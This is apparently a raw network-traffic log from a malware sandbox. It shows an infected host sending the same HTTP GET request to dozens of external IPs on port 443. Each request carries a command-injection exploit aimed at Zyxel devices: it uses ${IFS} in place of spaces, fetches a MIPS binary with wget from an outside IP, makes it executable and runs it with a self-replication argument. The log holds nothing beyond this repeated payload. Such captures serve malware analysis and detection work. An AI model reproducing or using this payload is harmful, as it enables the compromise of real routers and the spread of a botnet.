                                        Jan 14, 2024 16:18:41.369729996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3235192.168.2.1337368217.210.47.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369774103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3236192.168.2.134381844.137.248.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369811058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3237192.168.2.1336094146.143.204.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369854927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3238192.168.2.1344272184.210.128.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369890928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3239192.168.2.133350275.139.221.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369915962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3240192.168.2.1339138166.135.105.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369968891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3241192.168.2.1350106108.218.191.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369997025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3242192.168.2.1337212173.91.58.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370059013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3243192.168.2.1348672216.135.149.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370101929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3244192.168.2.1340030149.76.148.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370136976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3245192.168.2.1342796204.117.65.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370173931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3246192.168.2.1358840210.167.17.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370239019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3247192.168.2.1360480192.161.91.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370275021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3248192.168.2.135158282.191.6.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370311975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3249192.168.2.1336502216.209.181.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370362043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3250192.168.2.1360748139.244.49.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370389938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3251192.168.2.1358038141.252.143.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370429993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3252192.168.2.1334666161.140.18.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370481968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3253192.168.2.1339860185.200.129.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370527029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3254192.168.2.1344990209.190.98.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370557070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3255192.168.2.1350870120.127.141.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370573044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3256192.168.2.1343732158.82.220.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370635033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3257192.168.2.1342386121.140.66.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370666981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3258192.168.2.1345130105.86.2.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370697975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3259192.168.2.135246649.85.212.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370721102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3260192.168.2.134376460.206.184.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370791912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3261192.168.2.1350884121.99.97.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370836020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3262192.168.2.135230413.25.67.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370888948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3263192.168.2.1357088138.226.68.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370923996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3264192.168.2.135168061.22.196.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.370948076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3265192.168.2.135531859.232.116.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371007919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3266192.168.2.1347844184.95.201.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371052980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3267192.168.2.1350004210.169.103.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371100903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3268192.168.2.1333106185.176.32.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371129990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3269192.168.2.1334820150.185.57.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371176004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3270192.168.2.135254647.196.82.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371212959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3271192.168.2.1340848190.248.75.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371247053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3272192.168.2.1350566152.253.155.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371265888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3273192.168.2.1333264209.32.245.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371304035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3274192.168.2.13344009.128.104.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371361971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3275192.168.2.1353220195.35.177.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371406078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3276192.168.2.1353992211.79.7.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371436119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3277192.168.2.1333750129.164.133.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371486902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3278192.168.2.1339906125.97.41.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371516943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3279192.168.2.1338174164.15.94.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371582985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3280192.168.2.134167443.222.71.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371608973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3281192.168.2.134667464.104.36.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371681929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3282192.168.2.1356304181.152.137.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371702909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3283192.168.2.1357574118.151.73.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371733904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3284192.168.2.1342860194.74.48.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371757030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3285192.168.2.1359740164.137.78.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371814013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3286192.168.2.1345806182.132.244.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371849060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3287192.168.2.134995859.25.177.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371887922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3288192.168.2.1348610220.54.186.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371939898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3289192.168.2.135807831.204.217.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.371975899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3290192.168.2.1357644148.237.95.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372014046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3291192.168.2.1360224212.172.123.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372045040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3292192.168.2.1339392200.195.41.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372095108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3293192.168.2.13531761.222.38.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372133970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3294192.168.2.1333610217.128.176.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372173071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3295192.168.2.1360962126.30.193.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372203112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3296192.168.2.13398341.40.45.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372266054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3297192.168.2.1338068168.8.33.21443
                                        TimestampBytes transferredDirectionData
